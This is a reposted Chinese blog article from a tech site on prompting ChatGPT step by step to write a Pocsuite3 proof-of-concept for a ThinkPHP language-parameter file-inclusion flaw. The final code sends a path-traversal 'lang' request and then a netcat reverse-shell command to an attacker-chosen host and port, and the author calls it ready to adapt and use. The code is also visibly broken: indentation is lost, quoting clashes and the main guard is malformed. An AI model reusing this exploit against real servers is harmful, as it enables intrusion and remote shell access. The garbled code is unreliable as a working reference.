搜索歷史

清空
搜索熱詞
      0
      • 聊天消息
      • 系統(tǒng)消息
      • 評(píng)論與回復(fù)
      VIP于 到期 續(xù)費(fèi)
      登錄后你可以
      • 下載海量資料
      • 學(xué)習(xí)在線課程
      • 觀看技術(shù)視頻
      • 寫文章/發(fā)帖/加入社區(qū)
      會(huì)員中心
      創(chuàng)作中心
      發(fā)布
      創(chuàng)作活動(dòng)

      完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

      3天內(nèi)不再提示

      通過ChatGPT來快速編寫Pocsuite3

      jf_Fo0qk3ln ? 來源:FreeBuf.COM ? 2023-01-29 11:06 ? 次閱讀

      通過ChatGPT來快速編寫Pocsuite3

      前言

      這一模型可以與人類進(jìn)行談話般的交互,可以回答追問,連續(xù)性的問題,承認(rèn)其回答中的錯(cuò)誤,指出人類提問時(shí)的不正確前提,拒絕回答不適當(dāng)?shù)膯栴}。

      簡單來說,ChatGPT是一個(gè)AI,能夠分析我們題出的問題,并且對(duì)此做出解答??梢酝ㄟ^ChatGPT來分析代碼,或者讓其根據(jù)我們的需求寫出相應(yīng)的代碼,如下。

      99029812-9f08-11ed-bfe3-dac502259ad0.jpg

      所以,我就在想,能不能讓它給我們編寫poc,簡化平時(shí)的一個(gè)工作,于是便有了這篇文章。

      分析

      發(fā)現(xiàn)

      我發(fā)現(xiàn),ChatGPT緩存了當(dāng)此詢問的結(jié)果,當(dāng)我們前后兩個(gè)問題相似的時(shí)候,ChatGPT會(huì)去分析兩個(gè)問題的一個(gè)相似度,如果相似度過高,則會(huì)返回上一次分析的結(jié)果。而且對(duì)于有歧義的語句,其處理結(jié)果誤差比較大,所以我們可以一開始給出一個(gè)簡單的語句,然后通過逐步的訓(xùn)練,讓其結(jié)果更加符合我們的預(yù)期。

      過程

      原理

      在一開始,最好向CG(ChatGPT的簡稱)提供漏洞的相關(guān)原理,但是由我們直接去敘述,其準(zhǔn)確性比較低,因?yàn)檎Z言存在歧義,那么,我們可以通過引導(dǎo)的方式,去讓CG了解和漏洞有關(guān)的信息,比如ThinkPHP最新的漏洞原理是因?yàn)槎嗾Z言模式的開啟導(dǎo)致的文件包含,如果我們直接詢問。

      990efa9e-9f08-11ed-bfe3-dac502259ad0.jpg

      我們會(huì)發(fā)現(xiàn),CG無法為我們解析出來,因?yàn)槠鋵?shí)在這里lang_switch_on是config.php返回?cái)?shù)組中的一個(gè)鍵名,準(zhǔn)確來說并不是參數(shù),所以這里解析才會(huì)出錯(cuò)。我們知道config.php會(huì)返回一個(gè)數(shù)組,但是CG因?yàn)椴⒉粫?huì)去解析config.php,所以在它并不覺得config.php會(huì)返回什么。

      992fa726-9f08-11ed-bfe3-dac502259ad0.jpg
      但是我們換一種方法,我們?cè)儐枺?/p>

      993b6246-9f08-11ed-bfe3-dac502259ad0.jpg

      我們會(huì)發(fā)現(xiàn),CG給出了我們一個(gè)流程,那么在這里,CG就記住了這一答案,當(dāng)我們?cè)诼┒丛碇屑尤肓诉@句話,那么CG就能正確解析。

      分段

      當(dāng)我們直接通過一大段話讓其給我們編寫程序的時(shí)候,你會(huì)發(fā)現(xiàn)會(huì)有很多錯(cuò)誤,如下。

      994a0f1c-9f08-11ed-bfe3-dac502259ad0.jpg

      根據(jù)我上面的發(fā)現(xiàn),我突然想 ,我們可以先給出一個(gè)簡單的需求,在后面不斷基于之前給的答案,增加其準(zhǔn)確度就行。如下。

      首先,詢問是否知道pocsuite,并要求給出一個(gè)例子。

      9a3fd186-9f08-11ed-bfe3-dac502259ad0.jpg

      import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class TestPOC(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-01-01'
    createDate = '2022-01-01'
    updateDate = '2022-01-01'
    references = ['https://example.com/vul/12345']
    name = 'Test POC'
    appPowerLink = 'https://example.com'
    appName = 'Test'
    appVersion = '1.0'
    vulType = 'Test Vul'
    desc = '''Test POC Description'''
    samples = ['']

    def _attack(self):
        # your code here
        pass

    def _verify(self):
        # your code here
        result = {}
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        # your code here
        return output


def main():
    register_poc(TestPOC)


if __name__ == '__main__':
    main()

      接著,添加對(duì)漏洞的描述,要求其改進(jìn)。

      import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class ThinkPHP5_File_Inclusion(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-01-01'
    createDate = '2022-01-01'
    updateDate = '2022-01-01'
    references = ['https://example.com/vul/12345']
    name = 'ThinkPHP5 File Inclusion Vulnerability'
    appPowerLink = 'https://thinkphp.cn'
    appName = 'ThinkPHP'
    appVersion = '5.0'
    vulType = 'File Inclusion'
    desc = '''
    This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
    To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true,
    and a malicious lang parameter must be passed in the URL.
    '''
    samples = ['']

    def _attack(self):
        # your code here
        pass

    def _verify(self):
        result = {}
        # your code here
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)

      這時(shí)候,我們?cè)偬砑右恍┬畔ⅰ?/p>

      9a53927a-9f08-11ed-bfe3-dac502259ad0.jpg

      import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase

class ThinkPHP5_File_Inclusion(POCBase):
vulID = '12345'
version = '1.0'
author = 'test'
vulDate = '2022-12-09'
createDate = '2022-12-09'
updateDate = '2022-12-09'
references = ['https://tttang.com/archive/1865/']
name = 'ThinkPHP5 File Inclusion Vulnerability'
appPowerLink = 'https://thinkphp.cn'
appName = 'ThinkPHP'
appVersion = '5.0'
vulType = 'File Inclusion'
desc = '''
This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true,
and a malicious lang parameter must be passed in the URL. This can allow an attacker to include the
phearcmd.php file and execute arbitrary commands.
'''
samples = ['']

def _attack(self):
    # your code here
    pass

def _verify(self):
    result = {}
    # your code here
    # send a request with a malicious lang parameter
    url = self.url + '?lang=../phearcmd.php'
    r = req.get(url)

    # check if the phearcmd.php file was included
    if 'PhearCommand execution' in r.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = url

    return self.parse_output(result)

def parse_output(self, result):
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('The vulnerability could not be verified')
    return output

def main():
register_poc(ThinkPHP5_File_Inclusion)

if name == 'main':
main()

      最后,我們?cè)傺a(bǔ)充一點(diǎn)。

      9a6c8da2-9f08-11ed-bfe3-dac502259ad0.jpg

      import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase

class ThinkPHP5_File_Inclusion(POCBase):
vulID = '12345'
version = '1.0'
author = 'test'
vulDate = '2022-12-09'
createDate = '2022-12-09'
updateDate = '2022-12-09'
references = ['https://tttang.com/archive/1865/']
name = 'ThinkPHP5 File Inclusion Vulnerability'
appPowerLink = 'https://thinkphp.cn'
appName = 'ThinkPHP'
appVersion = '5.0'
vulType = 'File Inclusion'
desc = '''
This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true,
and a malicious lang parameter must be passed in the URL. This can allow an attacker to include the
phearcmd.php file and execute arbitrary commands, including a reverse shell.
'''
samples = ['']

def _attack(self):
    # your code here
    # send a request with a malicious lang parameter to include phearcmd.php
    url = self.url + '?lang=../phearcmd.php'
    r = req.get(url)

    # check if the phearcmd.php file was included
    if 'PhearCommand execution' in r.text:
        # send a request to execute a reverse shell command
        command = 'php -r "system('nc -e /bin/bash {0} {1}');"'.format(self.options.get('lhost'), self.options.get('lport'))
        url = self.url + '?phearcmd=' + command
        req.get(url)

def _verify(self):
    result = {}
    # your code here
    return self.parse_output(result)

def parse_output(self, result):
    output = Output(self)
    # no output is necessary for this POC
    return output

def main():
register_poc(ThinkPHP5_File_Inclusion)

if name == 'main':
main()

      到這里,基本上就可以拿來改改就能直接使用了。

      結(jié)論

      通過以上的利用和分析,我們能感受到CG的一個(gè)強(qiáng)大,當(dāng)CG對(duì)于我們的一個(gè)問題的解決結(jié)果誤差較大的時(shí)候,我們可以逐步進(jìn)行求解,讓其引擎對(duì)結(jié)果進(jìn)行不斷的修正,這樣最終的結(jié)果誤差較小。以上只是一個(gè)簡單的案例,還有更多的可能等待挖掘。

      審核編輯:湯梓紅

      聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
      • AI
        AI
        +關(guān)注

        關(guān)注

        87

        文章

        29806

        瀏覽量

        268103
      • 模型
        +關(guān)注

        關(guān)注

        1

        文章

        3112

        瀏覽量

        48658
      • 代碼
        +關(guān)注

        關(guān)注

        30

        文章

        4722

        瀏覽量

        68229
      • 編寫
        +關(guān)注

        關(guān)注

        0

        文章

        29

        瀏覽量

        8425
      • ChatGPT
        +關(guān)注

        關(guān)注

        29

        文章

        1546

        瀏覽量

        7356

      原文標(biāo)題:通過ChatGPT來快速編寫Pocsuite3

      文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

      收藏 人收藏

        評(píng)論

        相關(guān)推薦

        ChatGPT如何使用RLHF克服GPT-3存在的問題

        ChatGPT 是 OpenAI 發(fā)布的最新語言模型,比其前身 GPT-3 有顯著提升。與許多大型語言模型類似,ChatGPT 能以不同樣式、不同目的生成文本,并且在準(zhǔn)確度、敘述細(xì)節(jié)和上下文連貫性上具有更優(yōu)的表現(xiàn)。
        發(fā)表于 03-10 09:41 ?822次閱讀

        寫小說、編寫程序!強(qiáng)大的ChatGPT也有它的局限性!

        神經(jīng)網(wǎng)絡(luò)。Transformer架構(gòu)廣泛應(yīng)用于語言翻譯、文本摘要、問答等自然語言處理任務(wù)。 ? ChatGPT可用于創(chuàng)建能與用戶進(jìn)行對(duì)話的 聊天機(jī)器人 ,由ChatGPT構(gòu)建的對(duì)話機(jī)器人,可以高質(zhì)量的回答用戶的提問,能夠?qū)懶≌f,編寫
        的頭像 發(fā)表于 12-08 00:59 ?4936次閱讀

        【國產(chǎn)FPGA+OMAPL138開發(fā)板體驗(yàn)】(原創(chuàng))6.FPGA連接ChatGPT 4

        , SEND_TO_CHATGPT = 2, DISPLAY_RESPONSE = 3;: 哇,我們的狀態(tài)機(jī)好復(fù)雜啊,有四個(gè)狀態(tài)!不過沒關(guān)系,我們可以一步步。 再寫個(gè)簡單的: 首先,我需要澄清一點(diǎn),
        發(fā)表于 02-14 21:58

        怎么通過FPGA快速檢測(cè)DDR3是否工作正常

        在一個(gè)項(xiàng)目中,發(fā)現(xiàn)數(shù)據(jù)有異常,想判斷FPGA外掛的DDR3正常工作。因?yàn)閷?shí)際生產(chǎn)中,ddr容易出現(xiàn)虛焊或者使用一段時(shí)間后管腳出現(xiàn)接觸不良等問題。{:2:}現(xiàn)在想編寫一個(gè)程序快速判斷,
        發(fā)表于 04-12 16:56

        科技大廠競逐AIGC,中國的ChatGPT在哪?

        ChatGPT就是在GPT-3的基礎(chǔ)上通過指令微調(diào)后得到的。 圖源:OpenAI官網(wǎng) 結(jié)果,2022年年底ChatGPT實(shí)現(xiàn)了現(xiàn)象級(jí)的傳播,這出乎制作團(tuán)隊(duì)所料。OpenAI用了
        發(fā)表于 03-03 14:28

        【米爾MYD-JX8MMA7開發(fā)板-ARM+FPGA架構(gòu)試用體驗(yàn)】4.使用ChatGPT助力測(cè)試GPU

        領(lǐng)域的多種應(yīng)用場(chǎng)景比較適用。本次將測(cè)試該開發(fā)板的GPU圖形圖像處理能力,并在ChatGPT幫助下使用OpenGL E2.0 開發(fā)一個(gè)簡單的3D模型實(shí)時(shí)渲染的應(yīng)用,及使用ChatGPT
        發(fā)表于 04-10 02:07

        SecurityPoc基于Pocsuite3開發(fā)的POC插件掃描器

        gitee-security-poc.zip
        發(fā)表于 05-06 11:10 ?0次下載
        SecurityPoc基于<b class='flag-5'>Pocsuite3</b>開發(fā)的POC插件掃描器

        ChatGPT編寫各種腳本

        最牛逼的還是屬于程序編寫方面,ChatGPT在各個(gè)編程語言上面都挺在行的(嘗試了下Python, Perl, Tcl都挺不錯(cuò)的),可以說是一個(gè)各個(gè)語言都很了解的程序員了。
        的頭像 發(fā)表于 01-13 10:11 ?7331次閱讀

        chatgpt是什么

        chatgpt是什么 ChatGPT,美國OpenAI 。ChatGPT是人工智能技術(shù)驅(qū)動(dòng)的自然語言處理工具,它能夠通過學(xué)習(xí)和理解人類的語言
        發(fā)表于 02-10 14:05 ?3.9w次閱讀

        chatgpt怎么用

        chatgpt怎么用 chatgpt怎么用?chatgpt 簡介 ChatGPT是一種語言模型,它被訓(xùn)練對(duì)對(duì)話進(jìn)行建模。它能夠
        發(fā)表于 02-10 14:22 ?5.8w次閱讀

        體驗(yàn)一下ChatGPT帶我們寫代碼快感

        OpenAI的ChatGPT是一種自然語言處理技術(shù),它可以幫助開發(fā)者快速地完成代碼的編寫通過ChatGPT與Python相結(jié)合,開發(fā)人員
        的頭像 發(fā)表于 02-14 09:31 ?1942次閱讀

        如何通過Python與ChatGPT對(duì)話

        文章目錄 簡介 安裝 OpenAI API 實(shí)例1預(yù)備條件: 1. 科學(xué)上網(wǎng); 2.注冊(cè) OpenAI 賬號(hào) 。 簡介 ChatGPT 是 GPT-3 語言模型的變體,專為會(huì)話語言生成而設(shè)計(jì)。要在
        發(fā)表于 02-15 09:55 ?0次下載
        如何<b class='flag-5'>通過</b>Python與<b class='flag-5'>ChatGPT</b>對(duì)話

        ChatGPT for SegmentFault 插件來襲 ChatGPT for SegmentFault 插件使用方案解讀

        ChatGPT for SegmentFault 插件來襲,你真的準(zhǔn)備好了嗎?AI的改變有多大,讓我們拭目以待, ? ? ChatGPT for SegmentFault 是一款基于GPT-3的聊天
        的頭像 發(fā)表于 02-16 18:45 ?2917次閱讀

        從攻擊視角探討ChatGPT對(duì)網(wǎng)絡(luò)安全的影響

        、情景模型和語言模型來自動(dòng)生成文章,甚 至可以按照用戶的要求編寫代碼。 那么ChatGPT會(huì)對(duì)網(wǎng)絡(luò)安全行業(yè)帶來哪些影響呢? 接下來我們將通過系列文章,分別從“攻”、“防”、ChatGPT
        的頭像 發(fā)表于 02-22 08:15 ?1388次閱讀

        感谢您访问我们的网站,您可能还对以下资源感兴趣:

        好色先生污app